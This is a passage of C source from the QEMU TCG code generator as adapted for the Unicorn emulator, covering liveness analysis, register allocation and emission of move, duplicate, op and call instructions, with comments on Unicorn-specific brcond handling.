*/ if (!(def->flags & TCG_OPF_SIDE_EFFECTS) && nb_oargs != 0) { for (i = 0; i < nb_oargs; i++) { if (arg_temp(op->args[i])->state != TS_DEAD) { goto do_not_remove; } } goto do_remove; } goto do_not_remove; do_remove: tcg_op_remove(s, op); break; do_not_remove: for (i = 0; i < nb_oargs; i++) { ts = arg_temp(op->args[i]); /* Remember the preference of the uses that followed. */ op->output_pref[i] = *la_temp_pref(ts); /* Output args are dead. */ if (ts->state & TS_DEAD) { arg_life |= DEAD_ARG << i; } if (ts->state & TS_MEM) { arg_life |= SYNC_ARG << i; } ts->state = TS_DEAD; la_reset_pref(s, ts); } /* If end of basic block, update. */ if (def->flags & TCG_OPF_BB_EXIT) { la_func_end(s, nb_globals, nb_temps); } else if (def->flags & TCG_OPF_BB_END) { // Unicorn: do not optimize dead temps on brcond, // this causes problem because check_exit_request() inserts // brcond instruction in the middle of the TB, // which incorrectly flags end-of-block if (opc != INDEX_op_brcond_i32) { la_bb_end(s, nb_globals, nb_temps); } else { // Unicorn: we do not touch dead temps for brcond, // but we should refresh TCG globals In-Memory states, // otherwise, important CPU states(especially conditional flags) might be forgotten, // result in wrongly generated host code that run into wrong branch. // Refer to https://github.com/unicorn-engine/unicorn/issues/287 for further information la_brcond_end(s, nb_globals); } } else if (def->flags & TCG_OPF_SIDE_EFFECTS) { la_global_sync(s, nb_globals); if (def->flags & TCG_OPF_CALL_CLOBBER) { la_cross_call(s, nb_temps); } } /* Record arguments that die in this opcode. */ for (i = nb_oargs; i < nb_oargs + nb_iargs; i++) { ts = arg_temp(op->args[i]); if (ts->state & TS_DEAD) { arg_life |= DEAD_ARG << i; } } /* Input arguments are live for preceding opcodes. */ for (i = nb_oargs; i < nb_oargs + nb_iargs; i++) { ts = arg_temp(op->args[i]); if (ts->state & TS_DEAD) { /* For operands that were dead, initially allow all regs for the type. */ *la_temp_pref(ts) = s->tcg_target_available_regs[ts->type]; ts->state &= ~TS_DEAD; } } /* Incorporate constraints for this operand. */ switch (opc) { case INDEX_op_mov_i32: case INDEX_op_mov_i64: /* Note that these are TCG_OPF_NOT_PRESENT and do not have proper constraints. That said, special case moves to propagate preferences backward. */ if (IS_DEAD_ARG(1)) { *la_temp_pref(arg_temp(op->args[0])) = *la_temp_pref(arg_temp(op->args[1])); } break; default: for (i = nb_oargs; i < nb_oargs + nb_iargs; i++) { const TCGArgConstraint *ct = &def->args_ct[i]; TCGRegSet set, *pset; ts = arg_temp(op->args[i]); pset = la_temp_pref(ts); set = *pset; set &= ct->u.regs; if (ct->ct & TCG_CT_IALIAS) { set &= op->output_pref[ct->alias_index]; } /* If the combination is not possible, restart. */ if (set == 0) { set = ct->u.regs; } *pset = set; } break; } break; } op->life = arg_life; } } /* Liveness analysis: Convert indirect regs to direct temporaries. */ static bool liveness_pass_2(TCGContext *s) { int nb_globals = s->nb_globals; int nb_temps, i; bool changes = false; TCGOp *op, *op_next; /* Create a temporary for each indirect global. */ for (i = 0; i < nb_globals; ++i) { TCGTemp *its = &s->temps[i]; if (its->indirect_reg) { TCGTemp *dts = tcg_temp_alloc(s); dts->type = its->type; dts->base_type = its->base_type; its->state_ptr = dts; } else { its->state_ptr = NULL; } /* All globals begin dead. */ its->state = TS_DEAD; } for (nb_temps = s->nb_temps; i < nb_temps; ++i) { TCGTemp *its = &s->temps[i]; its->state_ptr = NULL; its->state = TS_DEAD; } QTAILQ_FOREACH_SAFE(op, &s->ops, link, op_next) { TCGOpcode opc = op->opc; const TCGOpDef *def = &s->tcg_op_defs[opc]; TCGLifeData arg_life = op->life; int nb_iargs, nb_oargs, call_flags; TCGTemp *arg_ts, *dir_ts; if (opc == INDEX_op_call) { nb_oargs = TCGOP_CALLO(op); nb_iargs = TCGOP_CALLI(op); call_flags = op->args[nb_oargs + nb_iargs + 1]; } else { nb_iargs = def->nb_iargs; nb_oargs = def->nb_oargs; /* Set flags similar to how calls require. */ if (def->flags & TCG_OPF_BB_END) { /* Like writing globals: save_globals */ call_flags = 0; } else if (def->flags & TCG_OPF_SIDE_EFFECTS) { /* Like reading globals: sync_globals */ call_flags = TCG_CALL_NO_WRITE_GLOBALS; } else { /* No effect on globals. */ call_flags = (TCG_CALL_NO_READ_GLOBALS | TCG_CALL_NO_WRITE_GLOBALS); } } /* Make sure that input arguments are available. */ for (i = nb_oargs; i < nb_iargs + nb_oargs; i++) { arg_ts = arg_temp(op->args[i]); if (arg_ts) { dir_ts = arg_ts->state_ptr; if (dir_ts && arg_ts->state == TS_DEAD) { TCGOpcode lopc = (arg_ts->type == TCG_TYPE_I32 ? INDEX_op_ld_i32 : INDEX_op_ld_i64); TCGOp *lop = tcg_op_insert_before(s, op, lopc); lop->args[0] = temp_arg(dir_ts); lop->args[1] = temp_arg(arg_ts->mem_base); lop->args[2] = arg_ts->mem_offset; /* Loaded, but synced with memory. */ arg_ts->state = TS_MEM; } } } /* Perform input replacement, and mark inputs that became dead. No action is required except keeping temp_state up to date so that we reload when needed. */ for (i = nb_oargs; i < nb_iargs + nb_oargs; i++) { arg_ts = arg_temp(op->args[i]); if (arg_ts) { dir_ts = arg_ts->state_ptr; if (dir_ts) { op->args[i] = temp_arg(dir_ts); changes = true; if (IS_DEAD_ARG(i)) { arg_ts->state = TS_DEAD; } } } } /* Liveness analysis should ensure that the following are all correct, for call sites and basic block end points. */ if (call_flags & TCG_CALL_NO_READ_GLOBALS) { /* Nothing to do */ } else if (call_flags & TCG_CALL_NO_WRITE_GLOBALS) { for (i = 0; i < nb_globals; ++i) { /* Liveness should see that globals are synced back, that is, either TS_DEAD or TS_MEM. */ arg_ts = &s->temps[i]; tcg_debug_assert(arg_ts->state_ptr == 0 || arg_ts->state != 0); } } else { for (i = 0; i < nb_globals; ++i) { /* Liveness should see that globals are saved back, that is, TS_DEAD, waiting to be reloaded. */ arg_ts = &s->temps[i]; tcg_debug_assert(arg_ts->state_ptr == 0 || arg_ts->state == TS_DEAD); } } /* Outputs become available. */ for (i = 0; i < nb_oargs; i++) { arg_ts = arg_temp(op->args[i]); dir_ts = arg_ts->state_ptr; if (!dir_ts) { continue; } op->args[i] = temp_arg(dir_ts); changes = true; /* The output is now live and modified. */ arg_ts->state = 0; /* Sync outputs upon their last write. */ if (NEED_SYNC_ARG(i)) { TCGOpcode sopc = (arg_ts->type == TCG_TYPE_I32 ? INDEX_op_st_i32 : INDEX_op_st_i64); TCGOp *sop = tcg_op_insert_after(s, op, sopc); sop->args[0] = temp_arg(dir_ts); sop->args[1] = temp_arg(arg_ts->mem_base); sop->args[2] = arg_ts->mem_offset; arg_ts->state = TS_MEM; } /* Drop outputs that are dead. */ if (IS_DEAD_ARG(i)) { arg_ts->state = TS_DEAD; } } } return changes; } #ifdef CONFIG_DEBUG_TCG static void dump_regs(TCGContext *s) { TCGTemp *ts; int i; char buf[64]; for(i = 0; i < s->nb_temps; i++) { ts = &s->temps[i]; fprintf(stderr, " %10s: ", tcg_get_arg_str_ptr(s, buf, sizeof(buf), ts)); switch(ts->val_type) { case TEMP_VAL_REG: fprintf(stderr, "%s", tcg_target_reg_names[ts->reg]); break; case TEMP_VAL_MEM: fprintf(stderr, "%d(%s)", (int)ts->mem_offset, tcg_target_reg_names[ts->mem_base->reg]); break; case TEMP_VAL_CONST: fprintf(stderr, "$0x%" TCG_PRIlx, ts->val); break; case TEMP_VAL_DEAD: fprintf(stderr, "D"); break; default: fprintf(stderr, "???"); break; } fprintf(stderr, "\n"); } for(i = 0; i < TCG_TARGET_NB_REGS; i++) { if (s->reg_to_temp[i] != NULL) { fprintf(stderr, "%s: %s\n", tcg_target_reg_names[i], tcg_get_arg_str_ptr(s, buf, sizeof(buf), s->reg_to_temp[i])); } } } static void check_regs(TCGContext *s) { int reg; int k; TCGTemp *ts; char buf[64]; for (reg = 0; reg < TCG_TARGET_NB_REGS; reg++) { ts = s->reg_to_temp[reg]; if (ts != NULL) { if (ts->val_type != TEMP_VAL_REG || ts->reg != reg) { fprintf(stderr, "Inconsistency for register %s:\n", tcg_target_reg_names[reg]); goto fail; } } } for (k = 0; k < s->nb_temps; k++) { ts = &s->temps[k]; if (ts->val_type == TEMP_VAL_REG && !ts->fixed_reg && s->reg_to_temp[ts->reg] != ts) { fprintf(stderr, "Inconsistency for temp %s:\n", tcg_get_arg_str_ptr(s, buf, sizeof(buf), ts)); fail: fprintf(stderr, "reg state:\n"); dump_regs(s); tcg_abort(); } } } #endif static void temp_allocate_frame(TCGContext *s, TCGTemp *ts) { #if !(defined(__sparc__) && TCG_TARGET_REG_BITS == 64) /* Sparc64 stack is accessed with offset of 2047 */ s->current_frame_offset = (s->current_frame_offset + (tcg_target_long)sizeof(tcg_target_long) - 1) & ~(sizeof(tcg_target_long) - 1); #endif if (s->current_frame_offset + (tcg_target_long)sizeof(tcg_target_long) > s->frame_end) { tcg_abort(); } ts->mem_offset = s->current_frame_offset; ts->mem_base = s->frame_temp; ts->mem_allocated = 1; s->current_frame_offset += sizeof(tcg_target_long); } static void temp_load(TCGContext *, TCGTemp *, TCGRegSet, TCGRegSet, TCGRegSet); /* Mark a temporary as free or dead. If 'free_or_dead' is negative, mark it free; otherwise mark it dead. */ static void temp_free_or_dead(TCGContext *s, TCGTemp *ts, int free_or_dead) { if (ts->fixed_reg) { return; } if (ts->val_type == TEMP_VAL_REG) { s->reg_to_temp[ts->reg] = NULL; } ts->val_type = (free_or_dead < 0 || ts->temp_local || ts->temp_global ? TEMP_VAL_MEM : TEMP_VAL_DEAD); } /* Mark a temporary as dead. */ static inline void temp_dead(TCGContext *s, TCGTemp *ts) { temp_free_or_dead(s, ts, 1); } /* Sync a temporary to memory. 'allocated_regs' is used in case a temporary registers needs to be allocated to store a constant. If 'free_or_dead' is non-zero, subsequently release the temporary; if it is positive, the temp is dead; if it is negative, the temp is free. */ static void temp_sync(TCGContext *s, TCGTemp *ts, TCGRegSet allocated_regs, TCGRegSet preferred_regs, int free_or_dead) { if (ts->fixed_reg) { return; } if (!ts->mem_coherent) { if (!ts->mem_allocated) { temp_allocate_frame(s, ts); } switch (ts->val_type) { case TEMP_VAL_CONST: /* If we're going to free the temp immediately, then we won't require it later in a register, so attempt to store the constant to memory directly. */ if (free_or_dead && tcg_out_sti(s, ts->type, ts->val, ts->mem_base->reg, ts->mem_offset)) { break; } temp_load(s, ts, s->tcg_target_available_regs[ts->type], allocated_regs, preferred_regs); /* fallthrough */ case TEMP_VAL_REG: tcg_out_st(s, ts->type, ts->reg, ts->mem_base->reg, ts->mem_offset); break; case TEMP_VAL_MEM: break; case TEMP_VAL_DEAD: default: tcg_abort(); } ts->mem_coherent = 1; } if (free_or_dead) { temp_free_or_dead(s, ts, free_or_dead); } } /* free register 'reg' by spilling the corresponding temporary if necessary */ static void tcg_reg_free(TCGContext *s, TCGReg reg, TCGRegSet allocated_regs) { TCGTemp *ts = s->reg_to_temp[reg]; if (ts != NULL) { temp_sync(s, ts, allocated_regs, 0, -1); } } /** * tcg_reg_alloc: * @required_regs: Set of registers in which we must allocate. * @allocated_regs: Set of registers which must be avoided. * @preferred_regs: Set of registers we should prefer. * @rev: True if we search the registers in "indirect" order. * * The allocated register must be in @required_regs & ~@allocated_regs, * but if we can put it in @preferred_regs we may save a move later. */ static TCGReg tcg_reg_alloc(TCGContext *s, TCGRegSet required_regs, TCGRegSet allocated_regs, TCGRegSet preferred_regs, bool rev) { int i, j, f, n = ARRAY_SIZE(tcg_target_reg_alloc_order); TCGRegSet reg_ct[2]; const int *order; reg_ct[1] = required_regs & ~allocated_regs; tcg_debug_assert(reg_ct[1] != 0); reg_ct[0] = reg_ct[1] & preferred_regs; /* Skip the preferred_regs option if it cannot be satisfied, or if the preference made no difference. */ f = reg_ct[0] == 0 || reg_ct[0] == reg_ct[1]; order = rev ? s->indirect_reg_alloc_order : tcg_target_reg_alloc_order; /* Try free registers, preferences first. */ for (j = f; j < 2; j++) { TCGRegSet set = reg_ct[j]; if (tcg_regset_single(set)) { /* One register in the set. */ TCGReg reg = tcg_regset_first(set); if (s->reg_to_temp[reg] == NULL) { return reg; } } else { for (i = 0; i < n; i++) { TCGReg reg = order[i]; if (s->reg_to_temp[reg] == NULL && tcg_regset_test_reg(set, reg)) { return reg; } } } } /* We must spill something. */ for (j = f; j < 2; j++) { TCGRegSet set = reg_ct[j]; if (tcg_regset_single(set)) { /* One register in the set. */ TCGReg reg = tcg_regset_first(set); tcg_reg_free(s, reg, allocated_regs); return reg; } else { for (i = 0; i < n; i++) { TCGReg reg = order[i]; if (tcg_regset_test_reg(set, reg)) { tcg_reg_free(s, reg, allocated_regs); return reg; } } } } tcg_abort(); } /* Make sure the temporary is in a register. If needed, allocate the register from DESIRED while avoiding ALLOCATED. */ static void temp_load(TCGContext *s, TCGTemp *ts, TCGRegSet desired_regs, TCGRegSet allocated_regs, TCGRegSet preferred_regs) { TCGReg reg; switch (ts->val_type) { case TEMP_VAL_REG: return; case TEMP_VAL_CONST: reg = tcg_reg_alloc(s, desired_regs, allocated_regs, preferred_regs, ts->indirect_base); tcg_out_movi(s, ts->type, reg, ts->val); ts->mem_coherent = 0; break; case TEMP_VAL_MEM: reg = tcg_reg_alloc(s, desired_regs, allocated_regs, preferred_regs, ts->indirect_base); tcg_out_ld(s, ts->type, reg, ts->mem_base->reg, ts->mem_offset); ts->mem_coherent = 1; break; case TEMP_VAL_DEAD: default: tcg_abort(); } ts->reg = reg; ts->val_type = TEMP_VAL_REG; s->reg_to_temp[reg] = ts; } /* Save a temporary to memory. 'allocated_regs' is used in case a temporary registers needs to be allocated to store a constant. */ static void temp_save(TCGContext *s, TCGTemp *ts, TCGRegSet allocated_regs) { /* The liveness analysis already ensures that globals are back in memory. Keep an tcg_debug_assert for safety. */ tcg_debug_assert(ts->val_type == TEMP_VAL_MEM || ts->fixed_reg); } /* save globals to their canonical location and assume they can be modified be the following code. 'allocated_regs' is used in case a temporary registers needs to be allocated to store a constant. */ static void save_globals(TCGContext *s, TCGRegSet allocated_regs) { int i, n; for (i = 0, n = s->nb_globals; i < n; i++) { temp_save(s, &s->temps[i], allocated_regs); } } /* sync globals to their canonical location and assume they can be read by the following code. 'allocated_regs' is used in case a temporary registers needs to be allocated to store a constant. */ static void sync_globals(TCGContext *s, TCGRegSet allocated_regs) { int i, n; for (i = 0, n = s->nb_globals; i < n; i++) { TCGTemp *ts = &s->temps[i]; tcg_debug_assert(ts->val_type != TEMP_VAL_REG || ts->fixed_reg || ts->mem_coherent); } } /* at the end of a basic block, we assume all temporaries are dead and all globals are stored at their canonical location. */ static void tcg_reg_alloc_bb_end(TCGContext *s, TCGRegSet allocated_regs) { // Unicorn: We are inserting brcond in the middle of the TB so the // assumptions here won't be satisfied. // int i; // for (i = s->nb_globals; i < s->nb_temps; i++) { // TCGTemp *ts = &s->temps[i]; // if (ts->temp_local) { // temp_save(s, ts, allocated_regs); // } else { // /* The liveness analysis already ensures that temps are dead. // Keep an tcg_debug_assert for safety. */ // tcg_debug_assert(ts->val_type == TEMP_VAL_DEAD); // } // } // save_globals(s, allocated_regs); } /* * Specialized code generation for INDEX_op_movi_*. */ static void tcg_reg_alloc_do_movi(TCGContext *s, TCGTemp *ots, tcg_target_ulong val, TCGLifeData arg_life, TCGRegSet preferred_regs) { /* ENV should not be modified. */ tcg_debug_assert(!ots->fixed_reg); /* The movi is not explicitly generated here. */ if (ots->val_type == TEMP_VAL_REG) { s->reg_to_temp[ots->reg] = NULL; } ots->val_type = TEMP_VAL_CONST; ots->val = val; ots->mem_coherent = 0; if (NEED_SYNC_ARG(0)) { temp_sync(s, ots, s->reserved_regs, preferred_regs, IS_DEAD_ARG(0)); } else if (IS_DEAD_ARG(0)) { temp_dead(s, ots); } } static void tcg_reg_alloc_movi(TCGContext *s, const TCGOp *op) { TCGTemp *ots = arg_temp(op->args[0]); tcg_target_ulong val = op->args[1]; tcg_reg_alloc_do_movi(s, ots, val, op->life, op->output_pref[0]); } /* * Specialized code generation for INDEX_op_mov_*. */ static void tcg_reg_alloc_mov(TCGContext *s, const TCGOp *op) { const TCGLifeData arg_life = op->life; TCGRegSet allocated_regs, preferred_regs; TCGTemp *ts, *ots; TCGType otype, itype; allocated_regs = s->reserved_regs; preferred_regs = op->output_pref[0]; ots = arg_temp(op->args[0]); ts = arg_temp(op->args[1]); /* ENV should not be modified. */ tcg_debug_assert(!ots->fixed_reg); /* Note that otype != itype for no-op truncation. */ otype = ots->type; itype = ts->type; if (ts->val_type == TEMP_VAL_CONST) { /* propagate constant or generate sti */ tcg_target_ulong val = ts->val; if (IS_DEAD_ARG(1)) { temp_dead(s, ts); } tcg_reg_alloc_do_movi(s, ots, val, arg_life, preferred_regs); return; } /* If the source value is in memory we're going to be forced to have it in a register in order to perform the copy. Copy the SOURCE value into its own register first, that way we don't have to reload SOURCE the next time it is used. */ if (ts->val_type == TEMP_VAL_MEM) { temp_load(s, ts, s->tcg_target_available_regs[itype], allocated_regs, preferred_regs); } tcg_debug_assert(ts->val_type == TEMP_VAL_REG); if (IS_DEAD_ARG(0)) { /* mov to a non-saved dead register makes no sense (even with liveness analysis disabled). */ tcg_debug_assert(NEED_SYNC_ARG(0)); if (!ots->mem_allocated) { temp_allocate_frame(s, ots); } tcg_out_st(s, otype, ts->reg, ots->mem_base->reg, ots->mem_offset); if (IS_DEAD_ARG(1)) { temp_dead(s, ts); } temp_dead(s, ots); } else { if (IS_DEAD_ARG(1) && !ts->fixed_reg) { /* the mov can be suppressed */ if (ots->val_type == TEMP_VAL_REG) { s->reg_to_temp[ots->reg] = NULL; } ots->reg = ts->reg; temp_dead(s, ts); } else { if (ots->val_type != TEMP_VAL_REG) { /* When allocating a new register, make sure to not spill the input one. */ tcg_regset_set_reg(allocated_regs, ts->reg); ots->reg = tcg_reg_alloc(s, s->tcg_target_available_regs[otype], allocated_regs, preferred_regs, ots->indirect_base); } if (!tcg_out_mov(s, otype, ots->reg, ts->reg)) { /* * Cross register class move not supported. * Store the source register into the destination slot * and leave the destination temp as TEMP_VAL_MEM. */ assert(!ots->fixed_reg); if (!ts->mem_allocated) { temp_allocate_frame(s, ots); } tcg_out_st(s, ts->type, ts->reg, ots->mem_base->reg, ots->mem_offset); ots->mem_coherent = 1; temp_free_or_dead(s, ots, -1); return; } } ots->val_type = TEMP_VAL_REG; ots->mem_coherent = 0; s->reg_to_temp[ots->reg] = ots; if (NEED_SYNC_ARG(0)) { temp_sync(s, ots, allocated_regs, 0, 0); } } } /* * Specialized code generation for INDEX_op_dup_vec. */ static void tcg_reg_alloc_dup(TCGContext *s, const TCGOp *op) { const TCGLifeData arg_life = op->life; TCGRegSet dup_out_regs, dup_in_regs; TCGTemp *its, *ots; TCGType itype, vtype; intptr_t endian_fixup; unsigned vece; bool ok; ots = arg_temp(op->args[0]); its = arg_temp(op->args[1]); /* ENV should not be modified. */ tcg_debug_assert(!ots->fixed_reg); itype = its->type; vece = TCGOP_VECE(op); vtype = TCGOP_VECL(op) + TCG_TYPE_V64; if (its->val_type == TEMP_VAL_CONST) { /* Propagate constant via movi -> dupi. */ tcg_target_ulong val = its->val; if (IS_DEAD_ARG(1)) { temp_dead(s, its); } tcg_reg_alloc_do_movi(s, ots, val, arg_life, op->output_pref[0]); return; } dup_out_regs = s->tcg_op_defs[INDEX_op_dup_vec].args_ct[0].u.regs; dup_in_regs = s->tcg_op_defs[INDEX_op_dup_vec].args_ct[1].u.regs; /* Allocate the output register now. */ if (ots->val_type != TEMP_VAL_REG) { TCGRegSet allocated_regs = s->reserved_regs; if (!IS_DEAD_ARG(1) && its->val_type == TEMP_VAL_REG) { /* Make sure to not spill the input register. */ tcg_regset_set_reg(allocated_regs, its->reg); } ots->reg = tcg_reg_alloc(s, dup_out_regs, allocated_regs, op->output_pref[0], ots->indirect_base); ots->val_type = TEMP_VAL_REG; ots->mem_coherent = 0; s->reg_to_temp[ots->reg] = ots; } switch (its->val_type) { case TEMP_VAL_REG: /* * The dup constriaints must be broad, covering all possible VECE. * However, tcg_op_dup_vec() gets to see the VECE and we allow it * to fail, indicating that extra moves are required for that case. */ if (tcg_regset_test_reg(dup_in_regs, its->reg)) { if (tcg_out_dup_vec(s, vtype, vece, ots->reg, its->reg)) { goto done; } /* Try again from memory or a vector input register. */ } if (!its->mem_coherent) { /* * The input register is not synced, and so an extra store * would be required to use memory. Attempt an integer-vector * register move first. We do not have a TCGRegSet for this. */ if (tcg_out_mov(s, itype, ots->reg, its->reg)) { break; } /* Sync the temp back to its slot and load from there. */ temp_sync(s, its, s->reserved_regs, 0, 0); } /* fall through */ case TEMP_VAL_MEM: #ifdef HOST_WORDS_BIGENDIAN endian_fixup = itype == TCG_TYPE_I32 ? 4 : 8; endian_fixup -= 1 << vece; #else endian_fixup = 0; #endif if (tcg_out_dupm_vec(s, vtype, vece, ots->reg, its->mem_base->reg, its->mem_offset + endian_fixup)) { goto done; } tcg_out_ld(s, itype, ots->reg, its->mem_base->reg, its->mem_offset); break; default: g_assert_not_reached(); } /* We now have a vector input register, so dup must succeed. */ ok = tcg_out_dup_vec(s, vtype, vece, ots->reg, ots->reg); tcg_debug_assert(ok); done: if (IS_DEAD_ARG(1)) { temp_dead(s, its); } if (NEED_SYNC_ARG(0)) { temp_sync(s, ots, s->reserved_regs, 0, 0); } if (IS_DEAD_ARG(0)) { temp_dead(s, ots); } } static void tcg_reg_alloc_op(TCGContext *s, const TCGOp *op) { const TCGLifeData arg_life = op->life; const TCGOpDef * const def = &s->tcg_op_defs[op->opc]; TCGRegSet i_allocated_regs; TCGRegSet o_allocated_regs; int i, k, nb_iargs, nb_oargs; TCGReg reg; TCGArg arg; const TCGArgConstraint *arg_ct; TCGTemp *ts; TCGArg new_args[TCG_MAX_OP_ARGS]; int const_args[TCG_MAX_OP_ARGS]; nb_oargs = def->nb_oargs; nb_iargs = def->nb_iargs; /* copy constants */ memcpy(new_args + nb_oargs + nb_iargs, op->args + nb_oargs + nb_iargs, sizeof(TCGArg) * def->nb_cargs); i_allocated_regs = s->reserved_regs; o_allocated_regs = s->reserved_regs; /* satisfy input constraints */ for (k = 0; k < nb_iargs; k++) { TCGRegSet i_preferred_regs, o_preferred_regs; i = def->sorted_args[nb_oargs + k]; arg = op->args[i]; arg_ct = &def->args_ct[i]; ts = arg_temp(arg); if (ts->val_type == TEMP_VAL_CONST && tcg_target_const_match(ts->val, ts->type, arg_ct)) { /* constant is OK for instruction */ const_args[i] = 1; new_args[i] = ts->val; continue; } i_preferred_regs = o_preferred_regs = 0; if (arg_ct->ct & TCG_CT_IALIAS) { o_preferred_regs = op->output_pref[arg_ct->alias_index]; if (ts->fixed_reg) { /* if fixed register, we must allocate a new register if the alias is not the same register */ if (arg != op->args[arg_ct->alias_index]) { goto allocate_in_reg; } } else { /* if the input is aliased to an output and if it is not dead after the instruction, we must allocate a new register and move it */ if (!IS_DEAD_ARG(i)) { goto allocate_in_reg; } /* check if the current register has already been allocated for another input aliased to an output */ if (ts->val_type == TEMP_VAL_REG) { int k2, i2; reg = ts->reg; for (k2 = 0 ; k2 < k ; k2++) { i2 = def->sorted_args[nb_oargs + k2]; if ((def->args_ct[i2].ct & TCG_CT_IALIAS) && reg == new_args[i2]) { goto allocate_in_reg; } } } i_preferred_regs = o_preferred_regs; } } temp_load(s, ts, arg_ct->u.regs, i_allocated_regs, i_preferred_regs); reg = ts->reg; if (tcg_regset_test_reg(arg_ct->u.regs, reg)) { /* nothing to do : the constraint is satisfied */ } else { allocate_in_reg: /* allocate a new register matching the constraint and move the temporary register into it */ temp_load(s, ts, s->tcg_target_available_regs[ts->type], i_allocated_regs, 0); reg = tcg_reg_alloc(s, arg_ct->u.regs, i_allocated_regs, o_preferred_regs, ts->indirect_base); if (!tcg_out_mov(s, ts->type, reg, ts->reg)) { /* * Cross register class move not supported. Sync the * temp back to its slot and load from there. */ temp_sync(s, ts, i_allocated_regs, 0, 0); tcg_out_ld(s, ts->type, reg, ts->mem_base->reg, ts->mem_offset); } } new_args[i] = reg; const_args[i] = 0; tcg_regset_set_reg(i_allocated_regs, reg); } /* mark dead temporaries and free the associated registers */ for (i = nb_oargs; i < nb_oargs + nb_iargs; i++) { if (IS_DEAD_ARG(i)) { temp_dead(s, arg_temp(op->args[i])); } } if (def->flags & TCG_OPF_BB_END) { tcg_reg_alloc_bb_end(s, i_allocated_regs); } else { if (def->flags & TCG_OPF_CALL_CLOBBER) { /* XXX: permit generic clobber register list ? */ for (i = 0; i < TCG_TARGET_NB_REGS; i++) { if (tcg_regset_test_reg(s->tcg_target_call_clobber_regs, i)) { tcg_reg_free(s, i, i_allocated_regs); } } } if (def->flags & TCG_OPF_SIDE_EFFECTS) { /* sync globals if the op has side effects and might trigger an exception. */ sync_globals(s, i_allocated_regs); } /* satisfy the output constraints */ for(k = 0; k < nb_oargs; k++) { i = def->sorted_args[k]; arg = op->args[i]; arg_ct = &def->args_ct[i]; ts = arg_temp(arg); /* ENV should not be modified. */ tcg_debug_assert(!ts->fixed_reg); if ((arg_ct->ct & TCG_CT_ALIAS) && !const_args[arg_ct->alias_index]) { reg = new_args[arg_ct->alias_index]; } else if (arg_ct->ct & TCG_CT_NEWREG) { reg = tcg_reg_alloc(s, arg_ct->u.regs, i_allocated_regs | o_allocated_regs, op->output_pref[k], ts->indirect_base); } else { reg = tcg_reg_alloc(s, arg_ct->u.regs, o_allocated_regs, op->output_pref[k], ts->indirect_base); } tcg_regset_set_reg(o_allocated_regs, reg); if (ts->val_type == TEMP_VAL_REG) { s->reg_to_temp[ts->reg] = NULL; } ts->val_type = TEMP_VAL_REG; ts->reg = reg; /* * Temp value is modified, so the value kept in memory is * potentially not the same. */ ts->mem_coherent = 0; s->reg_to_temp[reg] = ts; new_args[i] = reg; } } /* emit instruction */ if (def->flags & TCG_OPF_VECTOR) { tcg_out_vec_op(s, op->opc, TCGOP_VECL(op), TCGOP_VECE(op), new_args, const_args); } else { tcg_out_op(s, op->opc, new_args, const_args); } /* move the outputs in the correct register if needed */ for(i = 0; i < nb_oargs; i++) { ts = arg_temp(op->args[i]); /* ENV should not be modified. */ tcg_debug_assert(!ts->fixed_reg); if (NEED_SYNC_ARG(i)) { temp_sync(s, ts, o_allocated_regs, 0, IS_DEAD_ARG(i)); } else if (IS_DEAD_ARG(i)) { temp_dead(s, ts); } } } #ifdef TCG_TARGET_STACK_GROWSUP #define STACK_DIR(x) (-(x)) #else #define STACK_DIR(x) (x) #endif static void tcg_reg_alloc_call(TCGContext *s, TCGOp *op) { const int nb_oargs = TCGOP_CALLO(op); const int nb_iargs = TCGOP_CALLI(op); const TCGLifeData arg_life = op->life; int flags, nb_regs, i; TCGReg reg; TCGArg arg; TCGTemp *ts; intptr_t stack_offset; size_t call_stack_size; tcg_insn_unit *func_addr; int allocate_args; TCGRegSet allocated_regs; func_addr = (tcg_insn_unit *)(intptr_t)op->args[nb_oargs + nb_iargs]; flags = op->args[nb_oargs + nb_iargs + 1]; nb_regs = ARRAY_SIZE(tcg_target_call_iarg_regs); #if TCG_TARGET_REG_BITS != 64 #ifdef _MSC_VER // do this because MSVC cannot have array with 0 entries. /* ref: tcg/i386/tcg-target.inc.c: tcg_target_call_iarg_regs, it is added a dummy value, set back to 0. */ nb_regs = 0; #endif #endif if (nb_regs > nb_iargs) { nb_regs = nb_iargs; } /* assign stack slots first */ call_stack_size = (nb_iargs - nb_regs) * sizeof(tcg_target_long); call_stack_size = (call_stack_size + TCG_TARGET_STACK_ALIGN - 1) & ~(TCG_TARGET_STACK_ALIGN - 1); allocate_args = (call_stack_size > TCG_STATIC_CALL_ARGS_SIZE); if (allocate_args) { /* XXX: if more than TCG_STATIC_CALL_ARGS_SIZE is needed, preallocate call stack */ tcg_abort(); } stack_offset = TCG_TARGET_CALL_STACK_OFFSET; for (i = nb_regs; i < nb_iargs; i++) { arg = op->args[nb_oargs + i]; #ifdef TCG_TARGET_STACK_GROWSUP stack_offset -= sizeof(tcg_target_long); #endif if (arg != TCG_CALL_DUMMY_ARG) { ts = arg_temp(arg); temp_load(s, ts, s->tcg_target_available_regs[ts->type], s->reserved_regs, 0); tcg_out_st(s, ts->type, ts->reg, TCG_REG_CALL_STACK, stack_offset); } #ifndef TCG_TARGET_STACK_GROWSUP stack_offset += sizeof(tcg_target_long); #endif } /* assign input registers */ allocated_regs = s->reserved_regs; for (i = 0; i < nb_regs; i++) { arg = op->args[nb_oargs + i]; if (arg != TCG_CALL_DUMMY_ARG) { ts = arg_temp(arg); reg = tcg_target_call_iarg_regs[i]; if (ts->val_type == TEMP_VAL_REG) { if (ts->reg != reg) { tcg_reg_free(s, reg, allocated_regs); if (!tcg_out_mov(s, ts->type, reg, ts->reg)) { /* * Cross register class move not supported. Sync the * temp back to its slot and load from there. */ temp_sync(s, ts, allocated_regs, 0, 0); tcg_out_ld(s, ts->type, reg, ts->mem_base->reg, ts->mem_offset); } } } else { TCGRegSet arg_set = 0; tcg_reg_free(s, reg, allocated_regs); tcg_regset_set_reg(arg_set, reg); temp_load(s, ts, arg_set, allocated_regs, 0); } tcg_regset_set_reg(allocated_regs, reg); } } /* mark dead temporaries and free the associated registers */ for (i = nb_oargs; i < nb_iargs + nb_oargs; i++) { if (IS_DEAD_ARG(i)) { temp_dead(s, arg_temp(op->args[i])); } } /* clobber call registers */ for (i = 0; i < TCG_TARGET_NB_REGS; i++) { if (tcg_regset_test_reg(s->tcg_target_call_clobber_regs, i)) { tcg_reg_free(s, i, allocated_regs); } } /* Save globals if they might be written by the helper, sync them if they might be read. */ if (flags & TCG_CALL_NO_READ_GLOBALS) { /* Nothing to do */ } else if (flags & TCG_CALL_NO_WRITE_GLOBALS) { sync_globals(s, allocated_regs); } else { save_globals(s, allocated_regs); } tcg_out_call(s, func_addr); /* assign output registers and emit 